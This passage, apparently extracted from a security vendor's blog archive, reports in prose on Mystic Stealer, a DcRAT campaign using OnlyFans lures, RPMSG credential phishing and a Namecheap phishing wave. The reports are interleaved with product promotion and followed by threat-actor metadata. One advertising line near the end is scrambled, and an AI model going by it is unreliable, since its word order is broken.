hashes were issued by\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 130 of 136\n\nBarracuda to help clients determine if their ESG devices had been compromised and Barracuda even offered its\r\ncustomers a new appliance, regardless of their patch status.\r\nThese attacks involved the discovery and exploitation of a previously unknown vulnerability in the ESG\r\nappliances and were the work of highly skilled hackers, although, like many attacks, the vulnerability was\r\nexploited via a malicious email. An extra layer of protection can be provided by SpamTitan Plus, which\r\nspecifically combats phishing emails and incorporates signature-based and AI-based behavioral detection\r\nmechanisms to improve protection against zero-day threats, including novel malware variants.  Using SpamTitan\r\nPlus in addition to other security solutions will greatly improve the probability of detecting and blocking\r\nmalicious emails and zero-day threats. These attacks demonstrate why it is important to have multiple layers of\r\nsecurity, and not to rely on a single cybersecurity solution.\r\nNew Mystic Stealer Malware Proves Popular with Cybercriminal Community\r\nby G Hunt | June 22, 2023 | Internet Security, Network Security, Phishing \u0026 Email Spam\r\nA new information stealing malware variant called Mystic Stealer is proving extremely popular with hackers. The\r\nmalware is currently being promoted on hacking forums and darknet marketplaces under the malware-as-a-service\r\nmodel, where hackers can rent access to the malware by paying a subscription fee, which ranges from $150 for a\r\nmonth to $390 for three months.\r\nAdverts for the malware first started appearing on hacking sites in April 2023 and the combination of low pricing,\r\nadvanced capabilities, and regular updates to the malware to incorporate requested features has seen it grow in\r\npopularity and become a firm favorite with cybercriminals. The team selling access to the malware operates a\r\nTelegram channel and seeks feedback from users on new features they would like to be added, shares development\r\nnews, and discusses various related topics.\r\nMystic Stealer has many capabilities with more expected to be added. The first update to the malware occurred\r\njust a month after the initial release, demonstrating it is under active development and indicating the developers\r\nare trying to make Mystic Stealer the malware of choice for a wide range of malicious actors. Mystic Stealer\r\ntargets 40 different web browsers, 70 browser extensions, 21 cryptocurrency applications, 9 MFA and password\r\nmanagement applications (including LastPass Free, Dashlane, Roboform, and NortPass), and 55 cryptocurrency\r\nbrowser extensions. The malware can also inject ads into browser sessions, redirect searches to malicious\r\nwebsites, and steal Steam and Telegram credentials and other sensitive data. The most recent version is also able\r\nto download additional payloads from its command-and-control server. The malware targets all Windows versions,\r\ndoes not need any dependencies, and operates in the memory, allowing it to evade antivirus solutions. The\r\nmalware is believed to be of Russian origin since it cannot be used in the Commonwealth of Independent States.\r\nMystic Stealer has recently been analyzed by researchers at InQuest, ZScaler, and Cyfirma, who report that the\r\nmalware communicates with its C2 server via a custom binary protocol over TCP, and currently has at least 50 C2\r\nservers. When the malware identifies data of interest, it compresses it, encrypts it, then transmits it to its C2 server,\r\nwhere users can access the data through their control panel.\r\nThe main methods of distribution have yet to be determined, but as more threat actors start using the malware,\r\ndistribution methods are likely to become more diverse. The best protection is to follow cybersecurity best\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 131 of 136\n\npractices and adopt a defense-in-depth approach, with multiple overlapping layers of security to protect against all\r\nof the main attack vectors: email delivery (phishing), web delivery (pirated software, drive-by downloads,\r\nmalvertising), and the exploitation of vulnerabilities.\r\nEmail security solutions should be used that have signature and behavioral-based detection capabilities and\r\nmachine learning techniques for detecting phishing emails (SpamTitan). Antivirus software should be used,\r\nideally, a solution that can scan the memory, along with advanced intrusion detection systems. To protect against\r\nweb-based attacks, a web filter (WebTitan) should be used to block malicious file downloads and prevent access to\r\nthe websites where malware is often downloaded (known malicious sites/warez/torrent). IT teams should ensure\r\nthat software updates and patches are applied promptly, prioritizing critical vulnerabilities and known exploited\r\nvulnerabilities. In the event of infection, damage can be severely limited by having a tested incident response plan\r\nin place.\r\nFinally, it is important to train the workforce on the most common threats and how to avoid them. Employees\r\nshould be trained on how to identify phishing attempts, be told never to download unauthorized software from the\r\nInternet, and be taught security best practices. The SafeTitan security awareness training and phishing simulation\r\nplatform provides comprehensive training and testing to improve human defenses against malware infections and\r\nother cyber threats.\r\nFree OnlyFans Content Used as a Lure in DcRAT Malware Campaign\r\nby G Hunt | June 21, 2023 | Phishing \u0026 Email Spam\r\nMalicious actors are distributing malware under the guise of free access to paywall-protected OnlyFans content.\r\nOnlyFans is a popular Internet content subscription platform, where visitors can pay to receive premium content\r\nfrom a range of different content creators such as social media personalities, musicians, and celebrities, although\r\nthe 18+ subscription platform is most commonly associated with X-rated content. The malware campaign targets\r\nindividuals looking to access the latter for free.\r\nThe campaign uses fake OnlyFans content and X-rated lures promising access to private photos, videos, and posts\r\nwithout having to pay for the content. Users are tricked into downloading an executable file, that installs a remote\r\naccess Trojan. A VBScript loader is contained in a ZIP file, and if executed, will deliver a variant of the\r\nAsynchRAT called DCRAT (aka DarkCrystal) -– a remote access Trojan that provides access to the user’s device.\r\nDcRAT allows remote access, but can also access the webcam, log keystrokes, manipulate files, steal credentials,\r\ncookies, and Discord tokens, and encrypt files for extortion.\r\nResearchers at eSentire identified the campaign after a user attempted to execute the VBscript loader, although it\r\nis currently unclear how the ZIP file containing the VBScript loader is being distributed. As such, a defense-in-depth approach is recommended to block the most likely attack vectors. Phishing emails are commonly used for\r\ndistributing malware. Any email that claims to offer free access to OnlyFans is a major red flag since the site\r\nrequires paid subscriptions to access content. SEO poisoning may be used to get malicious websites to appear high\r\nin the search engine results for key search terms, and malvertising – malicious adverts – may be displayed on\r\nlegitimate websites through third-party ad networks that direct users to URLs where free content is offered.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 132 of 136\n\nCompromised social media accounts may be used to post offers of free access to OnlyFans content, and SMS and\r\ninstant messaging service messages may advertise the offers and include links to malicious websites.\r\nAll of these ways of making contact with users can be combatted through phishing and security awareness training\r\nusing the SafeTitan platform. SafeTitan includes an extensive library of training content for creating security\r\nawareness training programs to improve awareness of threats, teach security best practices, and train users how to\r\nidentify phishing attempts. The platform also includes a phishing simulator for testing responses to phishing\r\nattacks, including phishing attempts with OnlyFans-related lures.\r\nEmail security solutions should be implemented to block any phishing attempts. SpamTitan incorporates signature\r\nand behavior-based detection mechanisms for identifying malicious attachments, link scanning, and machine\r\nlearning capabilities to identify zero-day phishing attacks. WebTitan Cloud can be used to improve protection\r\nagainst web-based attacks, such as malicious file downloads from malicious and compromised websites and to\r\nprevent access to risky categories of websites and websites that serve no work purpose. IT admins should also\r\nconsider implementing restrictions for script files, such as blocking VBScript and JavaScript from launching\r\ndownloaded executable content or using Group Policy Management Console to create open with parameters for\r\nscript files to ensure they are opened with notepad.exe. These measures will not only be effective at blocking this\r\nOnlyFans campaign but also for blocking attempts by other malicious actors to install malware and ransomware.\r\nRPMSG Attachments Used in Sophisticated Phishing Attacks to Steal M365\r\nCredentials\r\nby G Hunt | May 30, 2023 | Email Scams, Phishing \u0026 Email Spam\r\nA new phishing technique has been identified by security researchers that uses compromised Microsoft 365\r\naccounts to send phishing emails that contain .RPMSG attachments, which are used in a sophisticated attack to\r\ngain access to Microsoft 365 accounts.\r\nRPMSG files are used to deliver e-mails with the Rights-Managed Email Object Protocol enabled. In contrast to\r\nregular emails that are sent in plain text and can be read by anyone or any security solution, these files are\r\nencrypted and are stored as an encrypted file attachment. The files can also be used to limit the ability of users to\r\nforward or copy emails. The intended recipient can read the encrypted messages after they have been\r\nauthenticated, either by using their Microsoft 365 credentials or a one-time passcode.\r\nPhishing attacks using these files give the impression that the messages are protected and secured, as access is\r\nrestricted to authorized users. If a user is unfamiliar with RPMSG files and they perform a Google search, they\r\nwill quickly discover that these files are used for secure emails, giving the impression that the emails are genuine.\r\nThe use of RPMSG files in phishing attacks was discovered by researchers at Trustwave. In this scam, an email is\r\nsent from a compromised account, and since these accounts are at legitimate businesses, the emails appear\r\ngenuine. For example, one of the scams used a compromised account at the payment processing company Talus\r\nPay.\r\nThe emails are sent to targeted individuals, such as employees in the billing department of a company. The emails\r\nare encrypted, and credentials need to be entered before the content of the email can be viewed. In this campaign,\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 133 of 136\n\nthe emails tell the recipient that Talus Pay has sent them a protected message, and the email body includes a “Read\r\nthe message” button that users are prompted to click. The emails also contain a link that the user can click to learn\r\nabout messages protected by Microsoft Purview Message Encryption.\r\nIf the recipient clicks the link to read the message, they are directed to a legitimate Office 365 email webpage\r\nwhere they are required to authenticate with their Microsoft 365 credentials. After authentication, the user is\r\nredirected to a fake SharePoint document, which is hosted on the Adobe InDesign service. If they try to open the\r\nfile, they are directed to the final destination URL that shows a “Loading… Wait” message, and while on that\r\nURL, a malicious script runs and collects system information. When that process is completed, a cloned Microsoft\r\n365 login form is displayed, which sends the username and password to the attacker’s command and control\r\nserver if entered. The script collects information such as visitor ID, connect token and hash, video card renderer\r\ninformation, system language, device memory, hardware concurrency, installed browser plugins, browser window\r\ndetails, and OS architecture.\r\nThe problem with phishing attempts involving encrypted content is email security solutions are unable to decrypt\r\nthe content. In this scam, the only URL in the email directs the user to a legitimate Microsoft service which is not\r\nmalicious, making these phishing attempts difficult to block without also blocking legitimate Microsoft encrypted\r\nemails. The key to preventing this type of sophisticated phishing attack is education. Through security awareness\r\ntraining, employees should be warned never to open unsolicited encrypted messages, even if the messages appear\r\nto have been sent by a legitimate user. They should also be conditioned to report any such messages to their IT\r\nsecurity team for further investigation.\r\nThe SafeTitan security awareness training program can be used by businesses to create training courses for\r\nemployees, tailored to each individual’s role and the threats they are likely to encounter. The training content is\r\nengaging to improve knowledge retention and can be easily updated to include information on the latest threats,\r\nsuch as phishing attacks involving RPMSG files. The platform also includes a phishing simulator that can be used\r\nto automate phishing simulations on the workforce, and RPMSG phishing emails can easily be incorporated into\r\nthe simulator to check whether employees are fooled by these sophisticated attacks. If a user fails a phishing\r\nsimulation, they are automatically provided with training content in real-time relevant to the simulation they\r\nfailed. This on-the-spot training is the most effective way of re-educating the workforce and ensures training is\r\nprovided at the point when it is most likely to be effective.\r\nFor more information on SafeTitan Security awareness training and phishing protection, call the TitanHQ team\r\ntoday.\r\nNamecheap Customers Targeted in Sophisticated Phishing Scam\r\nby G Hunt | February 22, 2023 | Phishing \u0026 Email Spam\r\nPhishing emails often spoof a company and include its logos and branding, but one of the red flags that allow\r\nthese emails to be identified by users is the email address used in the campaign is set up on a domain unrelated to\r\nthe brand being spoofed. For instance, a phishing email spoofing FedEx is sent from a Gmail account. Oftentimes,\r\na display name is created that makes the email appear to come from a genuine account used by the spoofed\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 134 of 136\n\ncompany – FedEx customer service for instance – but a quick check will reveal the actual email address used,\r\nallowing users to identify the phishing attack.\r\nHowever, these checks sometimes fail, as highlighted by a recent phishing campaign that impersonated the\r\nlogistics company DHL and the software cryptocurrency wallet provider, MetaMask that targeted customers of the\r\ndomain registrar Namecheap. The emails originated from the legitimate customer communication platform\r\nSendGrid, which Namecheap uses for sending marketing communications and renewal notices to customers.\r\nNamecheap responded quickly when the attack was identified and disabled the accounts, but not in time to prevent\r\nmany phishing emails from being sent.\r\nThe emails spoofing DHL included the DHL Express logo and warned recipients that their parcel was not able to\r\nbe delivered because the sender did not pay the necessary delivery fees, as such, the parcel has been retained at the\r\ndelivery depot and will not be released until the delivery fees are paid.\r\nThe MetaMask emails purported to be a Know Your Customer verification request, which required the recipient to\r\nverify their identity to prevent their account from being suspended. If the verification is not completed, the emails\r\nclaimed, users would be unable to withdraw or transfer funds without interruption.\r\nIn both cases, the emails included a link that the users were required to click to complete the request – a\r\nNamecheap.com marketing link that redirected users to a phishing page on an unrelated domain. This was not a\r\ndata breach at Namecheap, but at the third-party system the company uses for sending emails – SendGrid. It is\r\ncurrently unclear how SendGrid was hijacked to send the phishing emails.\r\nPhishing emails may be sent from legitimate company email accounts, either an account at the actual company\r\nbeing spoofed or other well-known services such as SendGrid. In the summer of 2022, a phishing campaign was\r\nconducted targeting customers of the hardware cryptocurrency wallet Trezor, following a hack at the email\r\nmarketing platform MailChimp.\r\nPhishing attacks such as these can sneak past email defenses and are harder for employees to identify, which is\r\nwhy businesses need to adopt a defense-in-depth approach. Email security solutions will block the majority of\r\nspam and phishing emails, but no email security solution will block all malicious messages. In addition to an\r\nadvanced email security solution such as SpamTitan – which incorporates multiple layers of protection and\r\nmachine learning mechanisms to block novel phishing attacks – businesses should invest in security awareness\r\ntraining for employees and should provide the training continually throughout the year. Through comprehensive\r\ntraining, employees can be taught more than just the basics and can learn how to recognize and avoid\r\nsophisticated phishing attacks.\r\nA web filter is also recommended for blocking access to the malicious URLs that are used to harvest sensitive\r\ninformation. A web filter augments the spam filter by providing time-of-click protection against malicious links in\r\nemails and also protects against non-email methods used to drive traffic to phishing sites, such as malvertising,\r\nsmishing, and vishing attacks.\r\nIf you want to improve protection against phishing, call TitanHQ to find out more about improving the depth of\r\nyour security protections through spam filtering, security awareness training, and web filtering.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 135 of 136\n\nSource: https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 136 of 136\n\nThe engine that Mimecast for powers these catch rate, malware solutions has catch rate, recently been shown and has far lower to beat leading false positives. email security In the June Virus solutions such as Bulletin Test,\nTitanHQ had a 99.99% phishing catch rate, a spam catch rate of 99.98%, a malware catch rate of 100%, and zero\nfalse positives. PhishTitan catches 20 unique and sophisticated threats per 80,000 emails received that Microsoft\n Page 60 of 136", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/" ], "report_names": [ "emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates" ], "threat_actors": [ { "id": "1b1271d2-e9a2-4fc5-820b-69c9e4cfb312", "created_at": "2024-06-07T02:00:03.998431Z", "updated_at": "2026-04-10T02:00:03.64336Z", "deleted_at": null, "main_name": "RansomHub", "aliases": [], "source_name": "MISPGALAXY:RansomHub", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a6814184-2133-4520-b7b3-63e6b7be2f64", "created_at": "2025-08-07T02:03:25.019385Z", "updated_at": "2026-04-10T02:00:03.859468Z", "deleted_at": null, "main_name": "GOLD VICTOR", "aliases": [ "DEV-0832 ", "STAC5279 ", "Vanilla Tempest ", "Vice Society", "Vice Spider " ], "source_name": "Secureworks:GOLD VICTOR", "tools": [ "Advanced IP Scanner", "Advanced Port Scanner", "HelloKitty ransomware", "INC ransomware", "MEGAsync", "Neshta", "PAExec", "PolyVice ransomware", "PortStarter", "PsExec", "QuantumLocker ransomware", "Rhysida ransomware", "Supper", "SystemBC", "Zeppelin ransomware" ], "source_id": "Secureworks", "reports": null }, { "id": "2a8f551d-206b-48f0-8a03-ed34b29ca8b6", "created_at": "2024-10-04T02:00:04.748248Z", "updated_at": "2026-04-10T02:00:03.711864Z", "deleted_at": null, "main_name": "Storm-0494", "aliases": [], "source_name": "MISPGALAXY:Storm-0494", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8f68387a-aced-4c99-b2a6-aa85071a0ca3", "created_at": "2024-06-25T02:00:05.030976Z", "updated_at": "2026-04-10T02:00:03.656871Z", "deleted_at": null, "main_name": "Void Arachne", "aliases": [ "Silver Fox" ], "source_name": "MISPGALAXY:Void Arachne", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "a7805d1a-b8d0-4a42-ae86-1d8711e0b2b9", "created_at": "2024-08-28T02:02:09.729503Z", "updated_at": "2026-04-10T02:00:04.967533Z", "deleted_at": null, "main_name": "Void Arachne", "aliases": [ "Silver Fox" ], "source_name": "ETDA:Void Arachne", "tools": [ "Gh0stBins", "Gh0stCringe", "HoldingHands RAT", "Winos" ], "source_id": "ETDA", "reports": null }, { "id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b", "created_at": "2022-10-25T16:07:23.303713Z", "updated_at": "2026-04-10T02:00:04.530417Z", "deleted_at": null, "main_name": "ALPHV", "aliases": [ "ALPHV", "ALPHVM", "Ambitious Scorpius", "BlackCat Gang", "UNC4466" ], "source_name": "ETDA:ALPHV", "tools": [ "ALPHV", "ALPHVM", "BlackCat", "GO Simple Tunnel", "GOST", "Impacket", "LaZagne", "MEGAsync", "Mimikatz", "Munchkin", "Noberus", "PsExec", "Remcom", "RemoteCommandExecution", "WebBrowserPassView" ], "source_id": "ETDA", "reports": null }, { "id": "de5630ec-93e0-4ef5-9ac3-fe422789e03d", "created_at": "2024-11-01T02:00:52.730802Z", "updated_at": "2026-04-10T02:00:05.330644Z", "deleted_at": null, "main_name": "INC Ransom", "aliases": [ "INC Ransom", "GOLD IONIC" ], "source_name": "MITRE:INC Ransom", "tools": [ "PsExec", "Nltest", "Rclone", "AdFind", "esentutl", "INC Ransomware" ], "source_id": "MITRE", "reports": null }, { "id": "af10aec6-36a8-4bdb-ba47-8f75b6a4aa4b", "created_at": "2025-03-07T02:00:03.797427Z", "updated_at": "2026-04-10T02:00:03.821929Z", "deleted_at": null, "main_name": "Larva-208", "aliases": [ "EncryptHub" ], "source_name": "MISPGALAXY:Larva-208", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "84aa9dbe-e992-4dce-9d80-af3b2de058c0", "created_at": "2024-02-02T02:00:04.041676Z", "updated_at": "2026-04-10T02:00:03.537352Z", "deleted_at": null, "main_name": "Vanilla Tempest", "aliases": [ "DEV-0832", "Vice Society" ], "source_name": "MISPGALAXY:Vanilla Tempest", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434804, "ts_updated_at": 1775792253, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/32e7e9e18d0785cf45592e6d76a9440c5d0d2d46.pdf", "text": "https://archive.orkl.eu/32e7e9e18d0785cf45592e6d76a9440c5d0d2d46.txt", "img": "https://archive.orkl.eu/32e7e9e18d0785cf45592e6d76a9440c5d0d2d46.jpg" } }